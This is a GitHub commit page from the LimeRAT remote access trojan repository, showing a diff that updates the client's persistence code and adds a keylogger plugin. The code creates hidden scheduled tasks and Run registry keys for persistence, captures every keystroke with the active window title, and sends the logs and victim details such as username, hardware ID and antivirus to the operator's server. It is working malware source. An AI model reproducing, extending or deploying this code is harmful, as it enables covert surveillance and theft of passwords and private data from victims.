Skip to content
This repository has been archived by the owner on Jun 25, 2019. It is now read-only.

Commit

Permalink
UPDATE v0.1.8.4B
Browse files Browse the repository at this point in the history
-Added listview options
-Updated keylogger
  • Loading branch information
Nyrotication committed Sep 25, 2018
1 parent dffe2b7 commit ff51186
Show file tree
Hide file tree
Showing 23 changed files with 518 additions and 253 deletions.
Binary file modified .vs/LimeRAT/DesignTimeBuild/.dtbcache
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/.suo
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal
Binary file not shown.
4 changes: 1 addition & 3 deletions Project/Client/C_Commands.vb
Original file line number Diff line number Diff line change
Expand Up @@ -40,9 +40,6 @@
Catch ex As Exception
End Try

Case "KL"
C_TcpClient.Send("KL" + SPL + C_ID.HWID + SPL + IO.File.ReadAllText(IO.Path.GetTempPath + "\" + IO.Path.GetFileNameWithoutExtension(Windows.Forms.Application.ExecutablePath) + ".tmp"))

Case "CPL" 'check if plugin in installed, or ask server to send it
If GTV(A(1)) = Nothing Then
C_TcpClient.Send("GPL" + SPL + A(1))
Expand Down Expand Up @@ -81,6 +78,7 @@
Next
Next
Catch ex As Exception
C_TcpClient.Send("OK" + SPL + C_ID.HWID + SPL + C_ID.UserName)
C_TcpClient.Send("MSG" + SPL + "Plugin Error! " + ex.Message)
End Try
End Sub
Expand Down
8 changes: 3 additions & 5 deletions Project/Client/C_Installation.vb
Original file line number Diff line number Diff line change
Expand Up @@ -52,12 +52,10 @@

Private Shared Sub AddReg(ByVal Privileges As Boolean)
Try
If Privileges = True Then
'Microsoft.Win32.Registry.LocalMachine.CreateSubKey
'"schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "
Shell(BS(Convert.FromBase64String("c2NodGFza3MgL2NyZWF0ZSAvZiAvc2MgT05MT0dPTiAvUkwgSElHSEVTVCAvdG4gTGltZVJBVC1BZG1pbiAvdHIg")) + """'" & C_Settings.fullpath & "'""", AppWinStyle.Hide, False, -1)
If Privileges Then
Shell("schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr " + """'" & C_Settings.fullpath & "'""", AppWinStyle.Hide, False, -1)
Else
Microsoft.Win32.Registry.CurrentUser.CreateSubKey(BS(Convert.FromBase64String("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=="))).SetValue(C_Settings.EXE, C_Settings.fullpath)
Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(C_Settings.EXE, C_Settings.fullpath)
End If
Catch : End Try
End Sub
Expand Down
24 changes: 1 addition & 23 deletions Project/Client/C_Main.vb
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
'##################################################################
'## N Y A N C A T ||| Updated on Sept/22/2018 ##
'## N Y A N C A T ||| Updated on Sept/25/2018 ##
'##################################################################
'## ##
'## ##
Expand Down Expand Up @@ -80,9 +80,6 @@ Namespace Lime
_PIN.Start()
End If

Dim _KLG As Threading.Thread = New Threading.Thread(AddressOf StartKLG)
_KLG.Start()

Dim CHK As Threading.Thread = New Threading.Thread(AddressOf Checking)
CHK.Start()
#End Region
Expand Down Expand Up @@ -207,25 +204,6 @@ Namespace Lime
End Try
End Sub

Private Shared Sub StartKLG()
Try
If GTV("_KLG") = Nothing Then
While True
If C.Alive = True Then
Threading.Thread.CurrentThread.Sleep(11000)
C.Send("PLKLG")
Exit While
End If
Threading.Thread.Sleep(5000)
End While

Else
C_Commands.Plugin(GZip(Convert.FromBase64String(GTV("_KLG")), False))
End If
Catch ex As Exception
C.Send("MSG" + SPL + "_KLG Error! " + ex.Message)
End Try
End Sub
#End Region

End Class
Expand Down
4 changes: 2 additions & 2 deletions Project/Client/C_TcpClient.vb
Original file line number Diff line number Diff line change
Expand Up @@ -108,9 +108,9 @@ re:
Alive = True
MS = New IO.MemoryStream

Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.4A", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.4B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, "...", SPL, " ", SPL,
C_ID.Privileges.ToString, SPL, C_Settings.fullpath, SPL, Environment.ProcessorCount))
C_ID.Privileges.ToString, SPL, C_Settings.fullpath))

Dim T As New System.Threading.TimerCallback(AddressOf PING)
Tick = New System.Threading.Timer(T, Nothing, 0, 1)
Expand Down
Binary file modified Project/Plugins/ENC/Resources/DECF.exe
Binary file not shown.
146 changes: 146 additions & 0 deletions Project/Plugins/KLG/KLG.vb
Original file line number Diff line number Diff line change
@@ -0,0 +1,146 @@
Imports System.Runtime.InteropServices
Imports System.Windows.Forms

Public Class KLG

' njlogger v4
#Region "API"
<DllImport("user32.dll")>
Private Shared Function ToUnicodeEx(ByVal wVirtKey As UInteger, ByVal wScanCode As UInteger, ByVal lpKeyState As Byte(), <Out(), MarshalAs(UnmanagedType.LPWStr)> ByVal pwszBuff As System.Text.StringBuilder, ByVal cchBuff As Integer, ByVal wFlags As UInteger,
ByVal dwhkl As IntPtr) As Integer
End Function
<DllImport("user32.dll")>
Private Shared Function GetKeyboardState(ByVal lpKeyState As Byte()) As Boolean
End Function
<DllImport("user32.dll")>
Private Shared Function MapVirtualKey(ByVal uCode As UInteger, ByVal uMapType As UInteger) As UInteger
End Function
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As IntPtr, ByRef lpdwProcessID As Integer) As Integer
Private Declare Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32" () As IntPtr
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
#End Region
Private LastAV As Integer ' Last Active Window Handle
Private LastAS As String ' Last Active Window Title
Private lastKey As Keys = Nothing ' Last Pressed Key

Private Function AV() As String ' Get Active Window
Try
Dim o = GetForegroundWindow
Dim id As Integer
GetWindowThreadProcessId(o, id)
Dim p As Object = Process.GetProcessById(id)
If o.ToInt32 = LastAV And LastAS = p.MainWindowTitle Or p.MainWindowTitle.Length = 0 Then
Else

LastAV = o.ToInt32
LastAS = p.MainWindowTitle
Return vbNewLine & "[ " & HM() & " " & p.ProcessName & " " & LastAS & " ]" & vbNewLine
End If
Catch ex As Exception
End Try
Return ""
End Function
Public Clock As New Microsoft.VisualBasic.Devices.Clock
Private Function HM() As String
Try
Return Clock.LocalTime.ToString("yy/MM/dd")
Catch ex As Exception
Return "??/??/??"
End Try
End Function
Public Logs As String = ""
Dim keyboard As Object = New Microsoft.VisualBasic.Devices.Keyboard
Private Shared Function VKCodeToUnicode(ByVal VKCode As UInteger) As String
Try
Dim sbString As New System.Text.StringBuilder()
Dim bKeyState As Byte() = New Byte(254) {}
Dim bKeyStateStatus As Boolean = GetKeyboardState(bKeyState)
If Not bKeyStateStatus Then
Return ""
End If
Dim lScanCode As UInteger = MapVirtualKey(VKCode, 0)
Dim h As IntPtr = GetForegroundWindow()
Dim id As Integer = 0
Dim Aid As Integer = GetWindowThreadProcessId(h, id)
Dim HKL As IntPtr = GetKeyboardLayout(Aid)
ToUnicodeEx(VKCode, lScanCode, bKeyState, sbString, CInt(5), CUInt(0),
HKL)
Return sbString.ToString()
Catch ex As Exception
End Try
Return CType(VKCode, Keys).ToString
End Function
Private Function Fix(ByVal k As Keys) As String
Dim isuper As Boolean = keyboard.ShiftKeyDown
If keyboard.CapsLock = True Then
If isuper = True Then
isuper = False
Else
isuper = True
End If
End If
Try
Select Case k
Case Keys.F1, Keys.F2, Keys.F3, Keys.F4, Keys.F5, Keys.F6, Keys.F7, Keys.F8, Keys.F9, Keys.F10, Keys.F11, Keys.F12, Keys.End, Keys.Delete, Keys.Back
Return "[" & k.ToString & "]"
Case Keys.LShiftKey, Keys.RShiftKey, Keys.Shift, Keys.ShiftKey, Keys.Control, Keys.ControlKey, Keys.RControlKey, Keys.LControlKey, Keys.Alt
Return ""
Case Keys.Space
Return " "
Case Keys.Enter, Keys.Return
If Logs.EndsWith("[ENTER]" & vbNewLine) Then
Return ""
End If
Return "[ENTER]" & vbNewLine
Case Keys.Tab
Return "[TAP]" & vbNewLine
Case Else
If isuper = True Then
Return VKCodeToUnicode(k).ToUpper
Else
Return VKCodeToUnicode(k)
End If
End Select
Catch ex As Exception
If isuper = True Then
Return ChrW(k).ToString.ToUpper
Else
Return ChrW(k).ToString.ToLower
End If
End Try
End Function


Public Sub WRK()

Try
Dim lp As Integer = 0
While Main.Alive = True
lp += 1
For i As Integer = 0 To 255
If GetAsyncKeyState(i) = -32767 Then
Dim k As Keys = i
Dim s = Fix(k)
If s.Length > 0 Then
Logs &= AV()
Logs &= s
End If
lastKey = k
End If
Next
If lp = 250 Then
lp = 0
Main.Send("KL" + Main.SPL + Main.BOT + Main.SPL + Logs)
Logs = Nothing
End If
Threading.Thread.CurrentThread.Sleep(1)

End While
Catch ex As Exception

End Try


End Sub
End Class
1 change: 1 addition & 0 deletions Project/Plugins/KLG/KLG.vbproj
Original file line number Diff line number Diff line change
Expand Up @@ -62,6 +62,7 @@
<Import Include="System.Diagnostics" />
</ItemGroup>
<ItemGroup>
<Compile Include="KLG.vb" />
<Compile Include="Main.vb" />
<Compile Include="My Project\AssemblyInfo.vb" />
<Compile Include="My Project\Application.Designer.vb">
Expand Down
Loading

0 comments on commit ff51186

Please sign in to comment.